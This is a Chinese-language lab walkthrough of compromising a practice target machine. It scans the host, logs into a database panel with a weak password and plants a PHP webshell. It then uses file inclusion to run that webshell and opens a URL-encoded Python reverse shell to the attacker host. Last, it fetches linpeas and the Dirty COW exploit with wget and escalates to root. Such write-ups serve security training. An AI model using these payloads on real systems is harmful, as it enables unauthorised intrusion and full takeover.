一、主机发现

arp-scan -l

靶机ip为192.168.55.147

二、端口扫描、目录枚举、指纹识别

2.1端口扫描

发现有111这一个特殊端口，启用了rpcbind服务

2.2目录枚举

dirb http://192.168.55.147

2.3指纹识别

nmap 192.168.55.147 -sV -sC -O --version-all

三、进入靶机网站收集信息，反弹shell

进入靶机页面后发现没有交互界面，重新回到目录枚举时枚举到的目录中，依次查看枚举出来的目录

发现此目录下有一个php文件，别的很多目录都是js文件

访问后发现是一个登录框，首先去查找一下中间件的漏洞

发现版本号相同，可能能够利用

通过查看24044.txt文件可知，攻击者可以创建一个数据库，可以在其中写入一句话木马

尝试使用弱口令，发现admin即可成功登陆

登陆后需要根据刚刚的文件内容进行创建数据库并写入一句话木马

首先创建一个shell.php的数据库

切换到shell.php数据库中创建数据

然后创建表

写入一句话木马

<?php echo system($_GET["cmd"]); ?>

创建成功后给了绝对路径

现在就要考虑怎么进行访问了

回到首页

发现该网站可能存在文件包含漏洞

尝试访问创建的shell.php文件

http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php

http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php&cmd=whoami

成功！

接下来进行反弹shell

kali桌面进行444端口的监听

使用反弹shell的命令

http://192.168.55.147/view.php?page=../../../../../usr/databases/shell.php&cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.55.129%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

成功拿下shell

四、脏牛提权

首先进行靶机信息收集

uname-a
lsb_release -a

使用提权脚本查找一下内核漏洞

ls -la//首先查看目录权限，发现tmp目录具有权限
cd /tmp   //切换到tmp目录下
python -m http.server 80  //攻击机开启80端口
wget http://192.168.55.129/linpeas.sh    //靶机使用wget命令进行下载攻击机中的linpeas.sh脚本
chmod 777 linpeas.sh     //然后使用chmod命令赋予该脚本执行权限
./linpeas.sh   //使用该脚本

发现可以使用脏牛提权

在github中下载脚本到kali中

然后将脚本上传到靶机中

wget http://192.168.55.129/40839.c

在靶机中进行编译

gcc -pthread dirty.c -o dirty -lcrypt

执行exp

./dirty

提示输入密码，自己设置即可

然后使用ssh进行登录firefart用户即可

成功提权！